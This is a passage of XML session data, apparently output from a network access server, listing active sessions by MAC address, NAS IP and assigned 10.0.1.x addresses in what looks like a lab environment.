8.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.29</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:32:AC:12</user_name><calling_station_id>00:11:BB:32:AC:12</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.4</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:EA:51:8C</user_name><calling_station_id>00:11:BB:EA:51:8C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.20</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:C0:3F:00:00:00</user_name><calling_station_id>00:C0:3F:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.11</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:FB:D9:AD</user_name><calling_station_id>D8:EB:97:FB:D9:AD</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000EB</acct_session_id><server>web</server><framed_ip_address>10.0.1.14</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:4A:E9:75</user_name><calling_station_id>00:11:BB:4A:E9:75</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.97</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:F0:48:0F</user_name><calling_station_id>D8:EB:97:F0:48:0F</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000055</acct_session_id><server>web</server><framed_ip_address>10.0.1.96</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:1A:46:86</user_name><calling_station_id>00:00:AA:1A:46:86</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.98</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>50:01:6B:00:00:00</user_name><calling_station_id>50:01:6B:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.89</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:88:89:BC</user_name><calling_station_id>00:11:BB:88:89:BC</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.88</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:55:09:60</user_name><calling_station_id>00:11:BB:55:09:60</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.83</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:3C:AD:67</user_name><calling_station_id>D8:EB:97:3C:AD:67</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.82</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:70:75:3D</user_name><calling_station_id>D8:EB:97:70:75:3D</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000125</acct_session_id><server>web</server><framed_ip_address>10.0.1.68</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:F6:4C:E3</user_name><calling_station_id>00:11:BB:F6:4C:E3</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.66</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:67:59:B3</user_name><calling_station_id>00:00:AA:67:59:B3</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.63</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:E0:08:00:00:00</user_name><calling_station_id>00:E0:08:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.65</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:D2:BF:47</user_name><calling_station_id>00:11:BB:D2:BF:47</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.53</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:3F:34:08</user_name><calling_station_id>D8:EB:97:3F:34:08</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.52</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>40:8A:9A:00:00:00</user_name><calling_station_id>40:8A:9A:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.48</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:B9:46:D9</user_name><calling_station_id>00:11:BB:B9:46:D9</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.47</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:99:AD:F9</user_name><calling_station_id>00:00:AA:99:AD:F9</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.36</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:A4:E3:F1</user_name><calling_station_id>00:11:BB:A4:E3:F1</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000001F</acct_session_id><server>web</server><framed_ip_address>10.0.1.105</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:67:4C:7B</user_name><calling_station_id>D8:EB:97:67:4C:7B</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.35</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:1A:37:C5</user_name><calling_station_id>00:11:BB:1A:37:C5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:AD:A1:C8</user_name><calling_station_id>00:11:BB:AD:A1:C8</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.30</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:37:4C:5E</user_name><calling_station_id>00:11:BB:37:4C:5E</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000003E4</acct_session_id><server>web</server><framed_ip_address>10.0.1.24</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:7D:74:AD</user_name><calling_station_id>D8:EB:97:7D:74:AD</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.12</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:96:6D:B5</user_name><calling_station_id>00:00:AA:96:6D:B5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.16</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:C4:6D:E0</user_name><calling_station_id>00:11:BB:C4:6D:E0</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.15</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:30:E6:00:00:00</user_name><calling_station_id>00:30:E6:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.48</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:92:66:3C</user_name><calling_station_id>D8:EB:97:92:66:3C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.45</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:20:60:12</user_name><calling_station_id>00:11:BB:20:60:12</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.39</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:C9:E9:D3</user_name><calling_station_id>D8:EB:97:C9:E9:D3</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000076</acct_session_id><server>web</server><framed_ip_address>10.0.1.19</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:D2:6D:03</user_name><calling_station_id>D8:EB:97:D2:6D:03</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000000A</acct_session_id><server>web</server><framed_ip_address>10.0.1.13</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:DC:37:BD</user_name><calling_station_id>D8:EB:97:DC:37:BD</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000002D</acct_session_id><server>web</server><framed_ip_address>10.0.1.41</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:F5:7D:4F</user_name><calling_station_id>00:00:AA:F5:7D:4F</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000FF</acct_session_id><server>web</server><framed_ip_address>10.0.1.16</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:E8:FD:16</user_name><calling_station_id>D8:EB:97:E8:FD:16</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000003A</acct_session_id><server>web</server><framed_ip_address>10.0.1.4</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:24:66:5E</user_name><calling_station_id>D8:EB:97:24:66:5E</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000005C</acct_session_id><server>web</server><framed_ip_address>10.0.1.15</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:40:7E:8C</user_name><calling_station_id>00:11:BB:40:7E:8C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000008D</acct_session_id><server>web</server><framed_ip_address>10.0.1.52</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:97:60:09</user_name><calling_station_id>D8:EB:97:97:60:09</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000005E</acct_session_id><server>web</server><framed_ip_address>10.0.1.22</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:AC:62:47</user_name><calling_station_id>00:11:BB:AC:62:47</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000019</acct_session_id><server>web</server><framed_ip_address>10.0.1.31</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:85:AF:DF</user_name><calling_station_id>D8:EB:97:85:AF:DF</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000D7</acct_session_id><server>web</server><framed_ip_address>10.0.1.29</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:2B:C7:FC</user_name><calling_station_id>00:00:AA:2B:C7:FC</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000006E</acct_session_id><server>web</server><framed_ip_address>10.0.1.26</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:96:8F:E6</user_name><calling_station_id>00:11:BB:96:8F:E6</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000E8</acct_session_id><server>web</server><framed_ip_address>10.0.1.21</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:F1:E4:D2</user_name><calling_station_id>00:11:BB:F1:E4:D2</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000000B</acct_session_id><server>web</server><framed_ip_address>10.0.1.129</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:DE:42:39</user_name><calling_station_id>D8:EB:97:DE:42:39</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000000D</acct_session_id><server>web</server><framed_ip_address>10.0.1.21</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:78:88:C4</user_name><calling_station_id>00:11:BB:78:88:C4</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000007</acct_session_id><server>web</server><framed_ip_address>10.0.1.10</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:9A:91:9A</user_name><calling_station_id>D8:EB:97:9A:91:9A</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000B3</acct_session_id><server>web</server><framed_ip_address>10.0.1.48</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:30:54:DA</user_name><calling_station_id>00:11:BB:30:54:DA</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000001C</acct_session_id><server>web</server><framed_ip_address>10.0.1.10</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:2B:20:2C</user_name><calling_station_id>00:11:BB:2B:20:2C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000049</acct_session_id><server>web</server><framed_ip_address>10.0.1.63</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:57:CF:3C</user_name><calling_station_id>00:11:BB:57:CF:3C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000006</acct_session_id><server>web</server><framed_ip_address>10.0.1.48</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:44:3B:56</user_name><calling_station_id>D8:EB:97:44:3B:56</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000009F</acct_session_id><server>web</server><framed_ip_address>10.0.1.27</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:A0:36:F0</user_name><calling_station_id>D8:EB:97:A0:36:F0</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000064</acct_session_id><server>web</server><framed_ip_address>10.0.1.8</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:BE:E6:33</user_name><calling_station_id>D8:EB:97:BE:E6:33</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000012</acct_session_id><server>web</server><framed_ip_address>10.0.1.34</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:25:8B:1C</user_name><calling_station_id>D8:EB:97:25:8B:1C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000054</acct_session_id><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:E9:C1:3B</user_name><calling_station_id>00:00:AA:E9:C1:3B</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000D5</acct_session_id><server>web</server><framed_ip_address>10.0.1.12</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:A7:32:09</user_name><calling_station_id>D8:EB:97:A7:32:09</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000038</acct_session_id><server>web</server><framed_ip_address>10.0.1.10</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:6C:73:DC</user_name><calling_station_id>00:11:BB:6C:73:DC</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000DF</acct_session_id><server>web</server><framed_ip_address>10.0.1.37</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:8F:F9:05</user_name><calling_station_id>00:11:BB:8F:F9:05</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000097</acct_session_id><server>web</server><framed_ip_address>10.0.1.28</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:80:52:DB</user_name><calling_station_id>D8:EB:97:80:52:DB</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000043</acct_session_id><server>web</server><framed_ip_address>10.0.1.57</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:18:A5:BD</user_name><calling_station_id>00:11:BB:18:A5:BD</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000000F</acct_session_id><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:E1:D6:D5</user_name><calling_station_id>00:11:BB:E1:D6:D5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000005</acct_session_id><server>web</server><framed_ip_address>10.0.1.49</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:3E:E0:5C</user_name><calling_station_id>00:11:BB:3E:E0:5C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000003D</acct_session_id><server>web</server><framed_ip_address>10.0.1.23</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:76:90:5C</user_name><calling_station_id>D8:EB:97:76:90:5C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000026</acct_session_id><server>web</server><framed_ip_address>10.0.1.112</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:85:B5:30</user_name><calling_station_id>00:11:BB:85:B5:30</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000DD</acct_session_id><server>web</server><framed_ip_address>10.0.1.33</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:11:4C:07</user_name><calling_station_id>00:11:BB:11:4C:07</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000010</acct_session_id><server>web</server><framed_ip_address>10.0.1.139</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:58:12:96</user_name><calling_station_id>00:11:BB:58:12:96</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000057</acct_session_id><server>web</server><framed_ip_address>10.0.1.103</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:A5:5E:F0</user_name><calling_station_id>00:11:BB:A5:5E:F0</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000012B</acct_session_id><server>web</server><framed_ip_address>10.0.1.100</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:C4:D7:56</user_name><calling_station_id>00:11:BB:C4:D7:56</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000006F</acct_session_id><server>web</server><framed_ip_address>10.0.1.82</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:37:D4:F4</user_name><calling_station_id>D8:EB:97:37:D4:F4</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000004E</acct_session_id><server>web</server><framed_ip_address>10.0.1.61</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:03:E7:47</user_name><calling_station_id>00:00:AA:03:E7:47</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000004A</acct_session_id><server>web</server><framed_ip_address>10.0.1.62</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:8A:A8:3E</user_name><calling_station_id>00:00:AA:8A:A8:3E</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000027</acct_session_id><server>web</server><framed_ip_address>10.0.1.113</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:88:72:51</user_name><calling_station_id>D8:EB:97:88:72:51</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000005F</acct_session_id><server>web</server><framed_ip_address>10.0.1.42</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:C0:79:45</user_name><calling_station_id>00:00:AA:C0:79:45</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000081</acct_session_id><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:9A:CB:8B</user_name><calling_station_id>00:00:AA:9A:CB:8B</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000013</acct_session_id><server>web</server><framed_ip_address>10.0.1.22</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:0C:E4:02</user_name><calling_station_id>00:11:BB:0C:E4:02</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000035</acct_session_id><server>web</server><framed_ip_address>10.0.1.23</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:FA:8F:B3</user_name><calling_station_id>00:11:BB:FA:8F:B3</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000056</acct_session_id><server>web</server><framed_ip_address>10.0.1.65</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:A3:42:1E</user_name><calling_station_id>D8:EB:97:A3:42:1E</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000FD</acct_session_id><server>web</server><framed_ip_address>10.0.1.17</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:76:D0:9C</user_name><calling_station_id>00:11:BB:76:D0:9C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000119</acct_session_id><server>web</server><framed_ip_address>10.0.1.9</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:2C:F3:1E</user_name><calling_station_id>00:00:AA:2C:F3:1E</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000083</acct_session_id><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:61:A2:08</user_name><calling_station_id>D8:EB:97:61:A2:08</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000008</acct_session_id><server>web</server><framed_ip_address>10.0.1.34</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:8A:5D:98</user_name><calling_station_id>D8:EB:97:8A:5D:98</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000003C</acct_session_id><server>web</server><framed_ip_address>10.0.1.30</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:65:B7:59</user_name><calling_station_id>00:11:BB:65:B7:59</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000050</acct_session_id><server>web</server><framed_ip_address>10.0.1.4</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:34:02:23</user_name><calling_station_id>D8:EB:97:34:02:23</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000004F</acct_session_id><server>web</server><framed_ip_address>10.0.1.7</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:BF:F9:76</user_name><calling_station_id>00:11:BB:BF:F9:76</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000002A</acct_session_id><server>web</server><framed_ip_address>10.0.1.53</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:6F:E1:BF</user_name><calling_station_id>00:11:BB:6F:E1:BF</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000032</acct_session_id><server>web</server><framed_ip_address>10.0.1.19</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:2C:31:56</user_name><calling_station_id>00:11:BB:2C:31:56</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000036</acct_session_id><server>web</server><framed_ip_address>10.0.1.98</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:C7:5B:18</user_name><calling_station_id>D8:EB:97:C7:5B:18</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000113</acct_session_id><server>web</server><framed_ip_address>10.0.1.78</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:03:76:E7</user_name><calling_station_id>00:11:BB:03:76:E7</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000039</acct_session_id><server>web</server><framed_ip_address>10.0.1.31</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:A4:A6:29</user_name><calling_station_id>00:00:AA:A4:A6:29</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000015</acct_session_id><server>web</server><framed_ip_address>10.0.1.18</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:72:7B:94</user_name><calling_station_id>D8:EB:97:72:7B:94</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000065</acct_session_id><server>web</server><framed_ip_address>10.0.1.4</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:22:5D:76</user_name><calling_station_id>00:11:BB:22:5D:76</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000082</acct_session_id><server>web</server><framed_ip_address>10.0.1.19</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:E2:B5:3F</user_name><calling_station_id>00:00:AA:E2:B5:3F</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000002C</acct_session_id><server>web</server><framed_ip_address>10.0.1.4</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:44:6E:EA</user_name><calling_station_id>D8:EB:97:44:6E:EA</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000016</acct_session_id><server>web</server><framed_ip_address>10.0.1.41</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:8E:C6:10</user_name><calling_station_id>00:00:AA:8E:C6:10</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000073</acct_session_id><server>web</server><framed_ip_address>10.0.1.5</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:2E:B9:6E</user_name><calling_station_id>00:11:BB:2E:B9:6E</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000004</acct_session_id><server>web</server><framed_ip_address>10.0.1.59</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:F9:FD:77</user_name><calling_station_id>00:11:BB:F9:FD:77</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000001E</acct_session_id><server>web</server><framed_ip_address>10.0.1.30</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:18:A6:52</user_name><calling_station_id>00:11:BB:18:A6:52</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000002F</acct_session_id><server>web</server><framed_ip_address>10.0.1.45</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:1E:B7:59</user_name><calling_station_id>00:11:BB:1E:B7:59</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000005B</acct_session_id><server>web</server><framed_ip_address>10.0.1.13</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:DC:8B:D9</user_name><calling_station_id>00:11:BB:DC:8B:D9</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000029</acct_session_id><server>web</server><framed_ip_address>10.0.1.9</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:8B:16:7C</user_name><calling_station_id>00:11:BB:8B:16:7C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000000C</acct_session_id><server>web</server><framed_ip_address>10.0.1.130</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:4F:E9:53</user_name><calling_station_id>00:00:AA:4F:E9:53</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000005D</acct_session_id><server>web</server><framed_ip_address>10.0.1.49</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:39:D8:41</user_name><calling_station_id>00:11:BB:39:D8:41</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000060</acct_session_id><server>web</server><framed_ip_address>10.0.1.6</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:0C:CE:D3</user_name><calling_station_id>00:00:AA:0C:CE:D3</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000018</acct_session_id><server>web</server><framed_ip_address>10.0.1.96</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:ED:BE:DA</user_name><calling_station_id>00:11:BB:ED:BE:DA</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000086</acct_session_id><server>web</server><framed_ip_address>10.0.1.7</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:B6:52:06</user_name><calling_station_id>00:11:BB:B6:52:06</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000058</acct_session_id><server>web</server><framed_ip_address>10.0.1.63</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:3C:FD:7F</user_name><calling_station_id>00:11:BB:3C:FD:7F</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000001D</acct_session_id><server>web</server><framed_ip_address>10.0.1.22</framed_ip_add